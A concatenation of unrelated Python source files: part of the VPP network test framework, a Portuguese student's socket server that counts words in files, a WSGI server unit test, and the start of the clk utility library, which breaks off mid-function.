while True:
info = self.get_next_packet_info(info)
if info is None:
return None
if info.src == src_index:
return info
def get_next_packet_info_for_interface2(self, src_index, dst_index, info):
"""
Search the packet info list for the next packet info with same source
and destination interface indexes
:param src_index: source interface index to search for
:param dst_index: destination interface index to search for
:param info: packet info - where to start the search
:returns: packet info or None
"""
while True:
info = self.get_next_packet_info_for_interface(src_index, info)
if info is None:
return None
if info.dst == dst_index:
return info
def assert_equal(self, real_value, expected_value, name_or_class=None):
if name_or_class is None:
self.assertEqual(real_value, expected_value)
return
try:
msg = "Invalid %s: %d('%s') does not match expected value %d('%s')"
msg = msg % (getdoc(name_or_class).strip(),
real_value, str(name_or_class(real_value)),
expected_value, str(name_or_class(expected_value)))
except Exception:
msg = "Invalid %s: %s does not match expected value %s" % (
name_or_class, real_value, expected_value)
self.assertEqual(real_value, expected_value, msg)
def assert_in_range(self,
real_value,
expected_min,
expected_max,
name=None):
if name is None:
msg = None
else:
msg = "Invalid %s: %s out of range <%s,%s>" % (
name, real_value, expected_min, expected_max)
self.assertTrue(expected_min <= real_value <= expected_max, msg)
def assert_packet_checksums_valid(self, packet,
ignore_zero_udp_checksums=True):
received = packet.__class__(scapy.compat.raw(packet))
udp_layers = ['UDP', 'UDPerror']
checksum_fields = ['cksum', 'chksum']
checksums = []
counter = 0
temp = received.__class__(scapy.compat.raw(received))
while True:
layer = temp.getlayer(counter)
if layer:
layer = layer.copy()
layer.remove_payload()
for cf in checksum_fields:
if hasattr(layer, cf):
if ignore_zero_udp_checksums and \
0 == getattr(layer, cf) and \
layer.name in udp_layers:
continue
delattr(temp.getlayer(counter), cf)
checksums.append((counter, cf))
else:
break
counter = counter + 1
if 0 == len(checksums):
return
temp = temp.__class__(scapy.compat.raw(temp))
for layer, cf in checksums:
calc_sum = getattr(temp[layer], cf)
self.assert_equal(
getattr(received[layer], cf), calc_sum,
"packet checksum on layer #%d: %s" % (layer, temp[layer].name))
self.logger.debug(
"Checksum field `%s` on `%s` layer has correct value `%s`" %
(cf, temp[layer].name, calc_sum))
def assert_checksum_valid(self, received_packet, layer,
field_name='chksum',
ignore_zero_checksum=False):
""" Check checksum of received packet on given layer """
received_packet_checksum = getattr(received_packet[layer], field_name)
if ignore_zero_checksum and 0 == received_packet_checksum:
return
recalculated = received_packet.__class__(
scapy.compat.raw(received_packet))
delattr(recalculated[layer], field_name)
recalculated = recalculated.__class__(scapy.compat.raw(recalculated))
self.assert_equal(received_packet_checksum,
getattr(recalculated[layer], field_name),
"packet checksum on layer: %s" % layer)
def assert_ip_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'IP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_tcp_checksum_valid(self, received_packet,
ignore_zero_checksum=False):
self.assert_checksum_valid(received_packet, 'TCP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_udp_checksum_valid(self, received_packet,
ignore_zero_checksum=True):
self.assert_checksum_valid(received_packet, 'UDP',
ignore_zero_checksum=ignore_zero_checksum)
def assert_embedded_icmp_checksum_valid(self, received_packet):
if received_packet.haslayer(IPerror):
self.assert_checksum_valid(received_packet, 'IPerror')
if received_packet.haslayer(TCPerror):
self.assert_checksum_valid(received_packet, 'TCPerror')
if received_packet.haslayer(UDPerror):
self.assert_checksum_valid(received_packet, 'UDPerror',
ignore_zero_checksum=True)
if received_packet.haslayer(ICMPerror):
self.assert_checksum_valid(received_packet, 'ICMPerror')
def assert_icmp_checksum_valid(self, received_packet):
self.assert_checksum_valid(received_packet, 'ICMP')
self.assert_embedded_icmp_checksum_valid(received_packet)
def assert_icmpv6_checksum_valid(self, pkt):
if pkt.haslayer(ICMPv6DestUnreach):
self.assert_checksum_valid(pkt, 'ICMPv6DestUnreach', 'cksum')
self.assert_embedded_icmp_checksum_valid(pkt)
if pkt.haslayer(ICMPv6EchoRequest):
self.assert_checksum_valid(pkt, 'ICMPv6EchoRequest', 'cksum')
if pkt.haslayer(ICMPv6EchoReply):
self.assert_checksum_valid(pkt, 'ICMPv6EchoReply', 'cksum')
def get_packet_counter(self, counter):
if counter.startswith("/"):
counter_value = self.statistics.get_counter(counter)
else:
counters = self.vapi.cli("sh errors").split('\n')
counter_value = 0
for i in range(1, len(counters) - 1):
results = counters[i].split()
if results[1] == counter:
counter_value = int(results[0])
break
return counter_value
def assert_packet_counter_equal(self, counter, expected_value):
counter_value = self.get_packet_counter(counter)
self.assert_equal(counter_value, expected_value,
"packet counter `%s'" % counter)
def assert_error_counter_equal(self, counter, expected_value):
counter_value = self.statistics[counter].sum()
self.assert_equal(counter_value, expected_value,
"error counter `%s'" % counter)
@classmethod
def sleep(cls, timeout, remark=None):
# /* Allow sleep(0) to maintain win32 semantics, and as decreed
# * by Guido, only the main thread can be interrupted.
# */
# https://github.com/python/cpython/blob/6673decfa0fb078f60587f5cb5e98460eea137c2/Modules/timemodule.c#L1892 # noqa
if timeout == 0:
# yield quantum
if hasattr(os, 'sched_yield'):
os.sched_yield()
else:
time.sleep(0)
return
cls.logger.debug("Starting sleep for %es (%s)", timeout, remark)
before = time.time()
time.sleep(timeout)
after = time.time()
if after - before > 2 * timeout:
cls.logger.error("unexpected self.sleep() result - "
"slept for %es instead of ~%es!",
after - before, timeout)
cls.logger.debug(
"Finished sleep (%s) - slept %es (wanted %es)",
remark, after - before, timeout)
def pg_send(self, intf, pkts, worker=None, trace=True):
intf.add_stream(pkts, worker=worker)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start(trace=trace)
def send_and_assert_no_replies(self, intf, pkts, remark="", timeout=None):
self.pg_send(intf, pkts)
if not timeout:
timeout = 1
for i in self.pg_interfaces:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured(remark=remark)
timeout = 0.1
def send_and_expect(self, intf, pkts, output, n_rx=None, worker=None,
trace=True):
if not n_rx:
n_rx = len(pkts)
self.pg_send(intf, pkts, worker=worker, trace=trace)
rx = output.get_capture(n_rx)
if trace:
self.logger.debug(self.vapi.cli("show trace"))
return rx
def send_and_expect_only(self, intf, pkts, output, timeout=None):
self.pg_send(intf, pkts)
rx = output.get_capture(len(pkts))
outputs = [output]
if not timeout:
timeout = 1
for i in self.pg_interfaces:
if i not in outputs:
i.get_capture(0, timeout=timeout)
i.assert_nothing_captured()
timeout = 0.1
return rx
def get_testcase_doc_name(test):
return getdoc(test.__class__).splitlines()[0]
def get_test_description(descriptions, test):
short_description = test.shortDescription()
if descriptions and short_description:
return short_description
else:
return str(test)
class TestCaseInfo(object):
def __init__(self, logger, tempdir, vpp_pid, vpp_bin_path):
self.logger = logger
self.tempdir = tempdir
self.vpp_pid = vpp_pid
self.vpp_bin_path = vpp_bin_path
self.core_crash_test = None
class VppTestResult(unittest.TestResult):
"""
@property result_string
String variable to store the test case result string.
@property errors
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test which
raised an unexpected exception.
@property failures
List variable containing 2-tuples of TestCase instances and strings
holding formatted tracebacks. Each tuple represents a test where
a failure was explicitly signalled using the TestCase.assert*()
methods.
"""
failed_test_cases_info = set()
core_crash_test_cases_info = set()
current_test_case_info = None
def __init__(self, stream=None, descriptions=None, verbosity=None,
runner=None):
"""
:param stream File descriptor to store where to report test results.
Set to the standard error stream by default.
:param descriptions Boolean variable to store information if to use
test case descriptions.
:param verbosity Integer variable to store required verbosity level.
"""
super(VppTestResult, self).__init__(stream, descriptions, verbosity)
self.stream = stream
self.descriptions = descriptions
self.verbosity = verbosity
self.result_string = None
self.runner = runner
self.printed = []
def addSuccess(self, test):
"""
Record a test succeeded result
:param test:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSuccess() %s.%s(%s) called" % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc))
unittest.TestResult.addSuccess(self, test)
self.result_string = colorize("OK", GREEN)
self.send_result_through_pipe(test, PASS)
def addSkip(self, test, reason):
"""
Record a test skipped.
:param test:
:param reason:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSkip() %s.%s(%s) called, reason is %s" %
(test.__class__.__name__, test._testMethodName,
test._testMethodDoc, reason))
unittest.TestResult.addSkip(self, test, reason)
self.result_string = colorize("SKIP", YELLOW)
if reason == "not enough cpus":
self.send_result_through_pipe(test, SKIP_CPU_SHORTAGE)
else:
self.send_result_through_pipe(test, SKIP)
def symlink_failed(self):
if self.current_test_case_info:
try:
failed_dir = os.getenv('FAILED_DIR')
link_path = os.path.join(
failed_dir,
'%s-FAILED' %
os.path.basename(self.current_test_case_info.tempdir))
self.current_test_case_info.logger.debug(
"creating a link to the failed test")
self.current_test_case_info.logger.debug(
"os.symlink(%s, %s)" %
(self.current_test_case_info.tempdir, link_path))
if os.path.exists(link_path):
self.current_test_case_info.logger.debug(
'symlink already exists')
else:
os.symlink(self.current_test_case_info.tempdir, link_path)
except Exception as e:
self.current_test_case_info.logger.error(e)
def send_result_through_pipe(self, test, result):
if hasattr(self, 'test_framework_result_pipe'):
pipe = self.test_framework_result_pipe
if pipe:
pipe.send((test.id(), result))
def log_error(self, test, err, fn_name):
if self.current_test_case_info:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = test.description
else:
test_name = '%s.%s(%s)' % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc)
self.current_test_case_info.logger.debug(
"--- %s() %s called, err is %s" %
(fn_name, test_name, err))
self.current_test_case_info.logger.debug(
"formatted exception is:\n%s" %
"".join(format_exception(*err)))
def add_error(self, test, err, unittest_fn, error_type):
if error_type == FAIL:
self.log_error(test, err, 'addFailure')
error_type_str = colorize("FAIL", RED)
elif error_type == ERROR:
self.log_error(test, err, 'addError')
error_type_str = colorize("ERROR", RED)
else:
raise Exception('Error type %s cannot be used to record an '
'error or a failure' % error_type)
unittest_fn(self, test, err)
if self.current_test_case_info:
self.result_string = "%s [ temp dir used by test case: %s ]" % \
(error_type_str,
self.current_test_case_info.tempdir)
self.symlink_failed()
self.failed_test_cases_info.add(self.current_test_case_info)
if is_core_present(self.current_test_case_info.tempdir):
if not self.current_test_case_info.core_crash_test:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = str(test)
else:
test_name = "'{!s}' ({!s})".format(
get_testcase_doc_name(test), test.id())
self.current_test_case_info.core_crash_test = test_name
self.core_crash_test_cases_info.add(
self.current_test_case_info)
else:
self.result_string = '%s [no temp dir]' % error_type_str
self.send_result_through_pipe(test, error_type)
def addFailure(self, test, err):
"""
Record a test failed result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addFailure, FAIL)
def addError(self, test, err):
"""
Record a test error result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addError, ERROR)
def getDescription(self, test):
"""
Get test description
:param test:
:returns: test description
"""
return get_test_description(self.descriptions, test)
def startTest(self, test):
"""
Start a test
:param test:
"""
def print_header(test):
if test.__class__ in self.printed:
return
test_doc = getdoc(test)
if not test_doc:
raise Exception("No doc string for test '%s'" % test.id())
test_title = test_doc.splitlines()[0].rstrip()
test_title = colorize(test_title, GREEN)
if test.is_tagged_run_solo():
test_title = colorize(f"SOLO RUN: {test_title}", YELLOW)
# This block may overwrite the colorized title above,
# but we want this to stand out and be fixed
if test.has_tag(TestCaseTag.FIXME_VPP_WORKERS):
test_title = colorize(
f"FIXME with VPP workers: {test_title}", RED)
if hasattr(test, 'vpp_worker_count'):
if test.vpp_worker_count == 0:
test_title += " [main thread only]"
elif test.vpp_worker_count == 1:
test_title += " [1 worker thread]"
else:
test_title += f" [{test.vpp_worker_count} worker threads]"
if test.__class__.skipped_due_to_cpu_lack:
test_title = colorize(
f"{test_title} [skipped - not enough cpus, "
f"required={test.__class__.get_cpus_required()}, "
f"available={max_vpp_cpus}]", YELLOW)
print(double_line_delim)
print(test_title)
print(double_line_delim)
self.printed.append(test.__class__)
print_header(test)
self.start_test = time.time()
unittest.TestResult.startTest(self, test)
if self.verbosity > 0:
self.stream.writeln(
"Starting " + self.getDescription(test) + " ...")
self.stream.writeln(single_line_delim)
def stopTest(self, test):
"""
Called when the given test has been run
:param test:
"""
unittest.TestResult.stopTest(self, test)
if self.verbosity > 0:
self.stream.writeln(single_line_delim)
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
self.stream.writeln(single_line_delim)
else:
self.stream.writeln("%-68s %4.2f %s" %
(self.getDescription(test),
time.time() - self.start_test,
self.result_string))
self.send_result_through_pipe(test, TEST_RUN)
def printErrors(self):
"""
Print errors from running the test case
"""
if len(self.errors) > 0 or len(self.failures) > 0:
self.stream.writeln()
self.printErrorList('ERROR', self.errors)
self.printErrorList('FAIL', self.failures)
# ^^ that is the last output from unittest before summary
if not self.runner.print_summary:
devnull = unittest.runner._WritelnDecorator(open(os.devnull, 'w'))
self.stream = devnull
self.runner.stream = devnull
def printErrorList(self, flavour, errors):
"""
Print error list to the output stream together with error type
and test case description.
:param flavour: error type
:param errors: iterable errors
"""
for test, err in errors:
self.stream.writeln(double_line_delim)
self.stream.writeln("%s: %s" %
(flavour, self.getDescription(test)))
self.stream.writeln(single_line_delim)
self.stream.writeln("%s" % err)
class VppTestRunner(unittest.TextTestRunner):
"""
A basic test runner implementation which prints results to standard error.
"""
@property
def resultclass(self):
"""Class maintaining the results of the tests"""
return VppTestResult
def __init__(self, keep_alive_pipe=None, descriptions=True, verbosity=1,
result_pipe=None, failfast=False, buffer=False,
resultclass=None, print_summary=True, **kwargs):
# ignore stream setting here, use hard-coded stdout to be in sync
# with prints from VppTestCase methods ...
super(VppTestRunner, self).__init__(sys.stdout, descriptions,
verbosity, failfast, buffer,
resultclass, **kwargs)
KeepAliveReporter.pipe = keep_alive_pipe
self.orig_stream = self.stream
self.resultclass.test_framework_result_pipe = result_pipe
self.print_summary = print_summary
def _makeResult(self):
return self.resultclass(self.stream,
self.descriptions,
self.verbosity,
self)
def run(self, test):
"""
Run the tests
:param test:
"""
faulthandler.enable() # emit stack trace to stderr if killed by signal
result = super(VppTestRunner, self).run(test)
if not self.print_summary:
self.stream = self.orig_stream
result.stream = self.orig_stream
return result
class Worker(Thread):
def __init__(self, executable_args, logger, env=None, *args, **kwargs):
super(Worker, self).__init__(*args, **kwargs)
self.logger = logger
self.args = executable_args
if hasattr(self, 'testcase') and self.testcase.debug_all:
if self.testcase.debug_gdbserver:
self.args = ['/usr/bin/gdbserver', 'localhost:{port}'
.format(port=self.testcase.gdbserver_port)] + args
elif self.testcase.debug_gdb and hasattr(self, 'wait_for_gdb'):
self.args.append(self.wait_for_gdb)
self.app_bin = executable_args[0]
self.app_name = os.path.basename(self.app_bin)
if hasattr(self, 'role'):
self.app_name += ' {role}'.format(role=self.role)
self.process = None
self.result = None
env = {} if env is None else env
self.env = copy.deepcopy(env)
def wait_for_enter(self):
if not hasattr(self, 'testcase'):
return
if self.testcase.debug_all and self.testcase.debug_gdbserver:
print()
print(double_line_delim)
print("Spawned GDB Server for '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
elif self.testcase.debug_all and self.testcase.debug_gdb:
print()
print(double_line_delim)
print("Spawned '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
else:
return
print(single_line_delim)
print("You can debug '{app}' using:".format(app=self.app_name))
if self.testcase.debug_gdbserver:
print("sudo gdb " + self.app_bin +
" -ex 'target remote localhost:{port}'"
.format(port=self.testcase.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume from "
"within gdb by issuing the 'continue' command")
self.testcase.gdbserver_port += 1
elif self.testcase.debug_gdb:
print("sudo gdb " + self.app_bin +
" -ex 'attach {pid}'".format(pid=self.process.pid))
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
def run(self):
executable = self.args[0]
if not os.path.exists(executable) or not os.access(
executable, os.F_OK | os.X_OK):
# Exit code that means some system file did not exist,
# could not be opened, or had some other kind of error.
self.result = os.EX_OSFILE
raise EnvironmentError(
"executable '%s' is not found or executable." % executable)
self.logger.debug("Running executable '{app}': '{cmd}'"
.format(app=self.app_name,
cmd=' '.join(self.args)))
env = os.environ.copy()
env.update(self.env)
env["CK_LOG_FILE_NAME"] = "-"
self.process = subprocess.Popen(
['stdbuf', '-o0', '-e0'] + self.args, shell=False, env=env,
preexec_fn=os.setpgrp, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.wait_for_enter()
out, err = self.process.communicate()
self.logger.debug("Finished running `{app}'".format(app=self.app_name))
self.logger.info("Return code is `%s'" % self.process.returncode)
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stdout:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(out.decode('utf-8'))
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stderr:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(err.decode('utf-8'))
self.logger.info(single_line_delim)
self.result = self.process.returncode
if __name__ == '__main__':
pass
|
ladoServidor.py
|
# Aluno: Rafael Pais Cardoso
# DRE: 116140788
# Atividade: Lab 2
# Lado Servidor
import socket
import json
import os
import auxiliarBase
import select
import sys
import threading
HOST = '' # '' possibilita acessar qualquer endereco alcancavel da maquina local
PORTA = 5000 # porta onde chegarao as mensagens para essa aplicacao
SEPARADORES = [" ",",",".","!","?",":","/","\\",";","(",")","[","]","{","}"]
#define a lista de I/O de interesse (jah inclui a entrada padrao)
entradas = [sys.stdin]
#armazena historico de conexoes
conexoes = {}
def NormalizaTexto(texto):
return texto.lower()
def NormalizaJson(mensagem_json):
'''Transforma as letras da palavra e do arquivo buscados em minuscula
Entrada: mensagem no formato json
Saida: '''
mensagem_json["arquivo"] = NormalizaTexto(mensagem_json["arquivo"])
mensagem_json["palavra"] = NormalizaTexto(mensagem_json["palavra"])
def NomeDaPalavraValido(mensagem_json):
'''Verifica se a palavra esta correta
Entrada: mensagem no formato json
Saida: falso quando a palavra for invalida e verdadeiro quando valida'''
if not mensagem_json["palavra"] or mensagem_json["palavra"].isspace():
mensagem_json["sucesso"] = False
mensagem_json["mensagemErro"] = "Palavra inválida"
return False
else:
return True
def normalizacaoTokenizacao(dados):
'''Remove os separadores e transforma as letras das palavras em minuscula
Entrada: o arquivo de texto
Saida: o arquivo de texto com as letras das palavras em minuscula e sem os separadores'''
for delimitador in SEPARADORES:
dados = dados.lower().replace(delimitador, " ")
return dados
def ContaPalavrasDoArquivo(mensagem_json):
'''Conta o numero de ocorrencia da palavra no arquivo e atualiza a mensagem
Entrada: mensagem no formato json
Saida: '''
mensagem = 'Lendo o arquivo {nomeArquivo} e contando o número de ocorrências da palavra {nomePalavra}.'
print(mensagem.format(nomeArquivo = mensagem_json["arquivo"], nomePalavra = mensagem_json["palavra"]))
contador = 0
dados = auxiliarBase.LeArquivo(mensagem_json)
dados = normalizacaoTokenizacao(dados)
listaPalavras = dados.split()
for i in range(len(listaPalavras)):
if (listaPalavras[i] == mensagem_json["palavra"]):
contador+= 1
mensagem_json["contagem"] = contador
mensagem_json["sucesso"] = True
def IniciaServidor():
'''Cria um socket de servidor e o coloca em modo de espera por conexoes
Saida: o socket criado'''
# cria o socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Internet( IPv4 + TCP)
print('Servidor estabelecido.')
# vincula a localizacao do servidor
sock.bind((HOST, PORTA))
# coloca-se em modo de espera por conexoes
sock.listen(5)
# configura o socket para o modo nao-bloqueante
sock.setblocking(False)
# inclui o socket principal na lista de entradas de interesse
entradas.append(sock)
return sock
def AceitaConexao(sock):
'''Aceita o pedido de conexao de um cliente
Entrada: o socket do servidor
Saida: o novo socket da conexao e o endereco do cliente'''
# estabelece conexao com o proximo cliente
clisock, endr = sock.accept()
# registra a nova conexao
conexoes[clisock] = endr
return clisock, endr
def AtendeRequisicoes(clisock, endr):
'''Recebe mensagens e as envia de volta para o cliente (ate o cliente finalizar)
Entrada: socket da conexao e endereco do cliente
Saida: '''
while True:
# recebe dados do cliente
mensagemRecebida = clisock.recv(1024) # argumento indica a qtde maxima de dados
if not mensagemRecebida: # dados vazios: cliente encerrou
print(str(endr) + '-> encerrou')
clisock.close() # encerra a conexao com o cliente
return
json_obj_recv = json.loads(str(mensagemRecebida, encoding='utf-8')) # carrega o json
# normaliza o nome do arquivo e a palavra a ser buscada no texto
NormalizaJson(json_obj_recv)
# verifica se o nome do arquivo é válido. Caso não seja válido, retorna uma mensagem de erro para o cliente
if(not auxiliarBase.NomeDoArquivoValido(json_obj_recv)):
clisock.send(bytes(json.dumps(json_obj_recv), encoding='utf-8'))
continue
# verifica se o caminho do arquivo é válido. Caso não seja válido, retorna uma mensagem de erro para o cliente
if(not auxiliarBase.CaminhoDoArquivoValido(json_obj_recv)):
clisock.send(bytes(json.dumps(json_obj_recv), encoding='utf-8'))
continue
# verifica se o nome da palavra é válido. Caso não seja válido, retorna uma mensagem de erro para o cliente
if(not NomeDaPalavraValido(json_obj_recv)):
clisock.send(bytes(json.dumps(json_obj_recv), encoding='utf-8'))
continue
ContaPalavrasDoArquivo(json_obj_recv)
# envia mensagem para o cliente
print('Processamento concluído. Enviado mensagem para o cliente.')
clisock.send(bytes(json.dumps(json_obj_recv), encoding='utf-8'))
def Main():
'''Inicializa e implementa o loop principal (infinito) do servidor'''
clientes = [] #armazena as threads criadas para fazer join
sock = IniciaServidor()
print("Pronto para receber conexoes...")
print("Comandos basicos do servidor: \n'fim' para finalizar o servidor quando nao existir clientes ativos; \n'historico' para listar o historico de conexoes; \n'ativos' para listar os clientes ainda ativos")
while(True):
#espera por qualquer entrada de interesse
leitura, escrita, excecao = select.select(entradas, [], [])
#tratar todas as entradas prontas
for pronto in leitura:
if pronto == sock: #pedido novo de conexao
clisock, endr = AceitaConexao(sock)
print ('Conectado com: ', endr)
#cria nova thread para atender o cliente
cliente = threading.Thread(target=AtendeRequisicoes, args=(clisock,endr))
cliente.start()
clientes.append(cliente) #armazena a referencia da thread para usar com join()
elif pronto == sys.stdin: #entrada padrao
cmd = input()
if cmd == 'fim': #solicitacao de finalizacao do servidor
for c in clientes: #aguarda todas as threads terminarem
c.join()
sock.close()
sys.exit()
elif cmd == 'historico': #mostra o historico de conexoes
mensagem = 'Historico de conexoes: {historicoConexoes}.'
print(mensagem.format(historicoConexoes = str(conexoes.values())))
elif cmd == 'ativos': #mostra a qtde de threads que estao ativas
mensagem = 'Clientes ativos: {clientesAtivos}.'
print(mensagem.format(clientesAtivos = str(threading.active_count() - 1)))
Main()
|
test_all_ctrls_wsgi.py
|
# coding: utf-8
import os
from typing import Dict
import unittest
from threading import Thread
from time import sleep
import urllib.request
import urllib.error
import http.client
from wsgiref.simple_server import WSGIServer, make_server
from simple_http_server.logger import get_logger, set_level
import simple_http_server.server as server
set_level("DEBUG")
_logger = get_logger("wsgi_test")
class WSGIHttpRequestTest(unittest.TestCase):
PORT = 9092
WAIT_COUNT = 10
httpd: WSGIServer = None
server_ready = False
@classmethod
def start_server(cls):
_logger.info("start server in background. ")
root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
server.scan(project_dir=root, base_dir="tests/ctrls", regx=r'.*controllers.*')
wsgi_proxy = server.init_wsgi_proxy(resources={"/public/*": f"{root}/tests/static"})
def wsgi_simple_app(environment, start_response):
return wsgi_proxy.app_proxy(environment, start_response)
cls.httpd = make_server("", cls.PORT, wsgi_simple_app)
cls.server_ready = True
cls.httpd.serve_forever()
@classmethod
def setUpClass(cls):
Thread(target=cls.start_server, daemon=False, name="t").start()
retry = 0
while not cls.server_ready:
sleep(1)
retry = retry + 1
_logger.info(f"server is not ready wait. {retry}/{cls.WAIT_COUNT} ")
if retry >= cls.WAIT_COUNT:
raise Exception("Server start wait timeout.")
@classmethod
def tearDownClass(cls):
try:
cls.httpd.shutdown()
except:
pass
@classmethod
def visit(cls, ctx_path, headers: Dict[str, str] = {}, data=None, return_type: str = "TEXT"):
req: urllib.request.Request = urllib.request.Request(f"http://127.0.0.1:{cls.PORT}/{ctx_path}")
for k, v in headers.items():
req.add_header(k, v)
res: http.client.HTTPResponse = urllib.request.urlopen(req, data=data)
if return_type == "RESPONSE":
return res
elif return_type == "HEADERS":
headers = res.headers
res.close()
return headers
else:
txt = res.read().decode("utf-8")
res.close()
return txt
def test_header_echo(self):
res: http.client.HTTPResponse = self.visit(f"header_echo", headers={"X-KJ-ABC": "my-headers"}, return_type="RESPONSE")
assert "X-Kj-Abc" in res.headers
assert res.headers["X-Kj-Abc"] == "my-headers"
def test_static(self):
txt = self.visit("public/a.txt")
assert txt == "hello world!"
def test_path_value(self):
pval = "abc"
path_val = "xyz"
txt = self.visit(f"path_values/{pval}/{path_val}/x")
assert txt == f"<html><body>{pval}, {path_val}</body></html>"
def test_error(self):
try:
self.visit("error")
except urllib.error.HTTPError as err:
assert err.code == 400
error_msg = err.read().decode("utf-8")
_logger.info(error_msg)
assert error_msg == "code:400, message: Parameter Error!, explain: Test Parameter Error!"
def test_exception(self):
try:
self.visit("exception")
except urllib.error.HTTPError as err:
assert err.code == 500
error_msg = err.read().decode("utf-8")
_logger.info(error_msg)
assert error_msg == '500-Internal Server Error-some error occurs!'
|
lib.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""General purpose functions, not directly linked to clk"""
import datetime
import difflib
import functools
import getpass
import hashlib
import heapq
import itertools
import json
import os
import platform
import re
import shlex
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import time
import traceback
from contextlib import contextmanager
from copy import deepcopy
from pathlib import Path
from urllib.request import urlopen
import click
import colorama
import glob2
from click._termui_impl import ProgressBar as ProgressBar_
from click_completion import DocumentedChoice
from clk.click_helpers import click_get_current_context_safe
from clk.log import get_logger
LOGGER = get_logger(__name__)
dry_run = None
main_module = None
DocumentedChoice = DocumentedChoice
def read_properties_file(file_name):
return dict([line.strip().split('=') for line in open(file_name, 'r').readlines() if '=' in line])
def ensure_unicode(value):
"""Convert a string in unicode"""
if not isinstance(value, str):
return value.decode('utf-8')
else:
return value
def ln(src, link_name):
"""Create a symbolink link link_name -> src"""
if isinstance(src, Path):
src = str(src)
if isinstance(link_name, Path):
link_name = str(link_name)
LOGGER.action('create symlink {} -> {}'.format(link_name, src))
if not dry_run:
os.symlink(src, link_name)
def makedirs(dir):
"""Ensure a directory is created.
Possibly create the parent directories. If the directory already exists, do
nothing.
"""
if not os.path.exists(dir):
LOGGER.action('create directory {}'.format(dir))
if not dry_run:
os.makedirs(dir)
return Path(dir)
_makedirs = makedirs
def chmod(file, mode):
"""Change the mode bits of a file"""
LOGGER.action('chmod {} to {}'.format(file, oct(mode)))
if not dry_run:
os.chmod(file, mode)
def move(src, dst):
"""Rename src into dst
See shutil.move
"""
LOGGER.action('Move {} to {}'.format(src, dst))
if not dry_run:
shutil.move(src, dst)
def createfile(name, content, append=False, internal=False, force=False, makedirs=False, mode=None):
if os.path.exists(name) and not force:
click.UsageError(f'{name} already exists')
if makedirs:
_makedirs(Path(name).parent)
if internal:
logger = LOGGER.develop
else:
logger = LOGGER.action
if append:
logger('appending to the file {}'.format(name))
else:
logger('writing to the file {}'.format(name))
if dry_run:
logger('with content {}'.format(content))
else:
flag = 'a' if append else 'w'
flag += 'b'
open(name, flag).write(content.encode('utf-8'))
if mode:
chmod(name, mode)
return Path(name)
def copy(src, dst):
if isinstance(src, Path):
src = str(src)
if isinstance(dst, Path):
dst = str(dst)
LOGGER.action('copy {} to {}'.format(src, dst))
if dry_run:
return
if os.path.isdir(src):
shutil.copytree(src, dst)
else:
shutil.copy(src, dst)
def link(src, dst):
if platform.system() == 'Windows':
return copy(src, dst)
LOGGER.action('hard link {} to {}'.format(src, dst))
if dry_run:
return
os.link(src, dst)
def rm(*file_or_tree):
LOGGER.action('remove {}'.format(' '.join(map(str, file_or_tree))))
if dry_run:
return
for f in file_or_tree:
if os.path.isdir(f) and not os.path.islink(f):
shutil.rmtree(f)
else:
os.unlink(f)
# expose find_executable as which
def which(executable, path=None):
"""Tries to find 'executable' in the directories listed in 'path'.
A string listing directories separated by 'os.pathsep'; defaults to
os.environ['PATH']. Returns the complete filename or None if not found.
"""
if path is None:
path = os.environ['PATH']
paths = path.split(os.pathsep)
base, ext = os.path.splitext(executable)
exts = ['']
if (sys.platform == 'win32' or os.name == 'os2') and (ext != '.exe'):
exts = ['.cmd', '.bat', '.exe', '.com'] + exts
for ext in exts:
e = executable + ext
if os.path.isfile(e):
return e
else:
for p in paths:
f = os.path.join(p, e)
if os.path.isfile(f):
# the file exists, we have a shot at spawn working
return f
return None
# expose glob
@functools.wraps(glob2.glob)
def glob(pathname, *args, **kwargs):
if isinstance(pathname, Path):
pathname = str(pathname)
return glob2.glob(pathname, *args, **kwargs)
def glob_first(expr, default=None):
"""Return the first result of the globbing expression or 'default'"""
res = glob(expr)
return res[0] if res else default
def main_default(**default_options):
u"""Change the default values of the main method of a Command"""
def decorator(f):
oldmain = f.main
def main(*args, **options):
LOGGER.develop('Calling with args: {}'.format(args))
newopts = dict(default_options)
newopts.update(options)
oldmain(*args, **newopts)
f.main = main
return f
return decorator
def get_all_files_recursive(dir, exclude):
for dir, subdirs, files in os.walk(dir):
for excluded in set(exclude) & set(subdirs):
del subdirs[subdirs.index(excluded)]
for file in files:
yield os.path.join(dir, file)
def check_uptodate(src, dst, src_exclude=[], dst_exclude=[]):
assert os.path.exists(src), u'{} must exist'.format(src)
if not os.path.exists(dst):
return False
if os.path.isfile(src):
src_mtime = os.stat(src).st_mtime
src_f = src
elif os.path.isdir(src):
src_mtime, src_f = max(map(lambda f: (os.stat(f).st_mtime, f), get_all_files_recursive(src, src_exclude)),
key=lambda e: e[0])
else:
raise NotImplementedError
if os.path.isfile(dst):
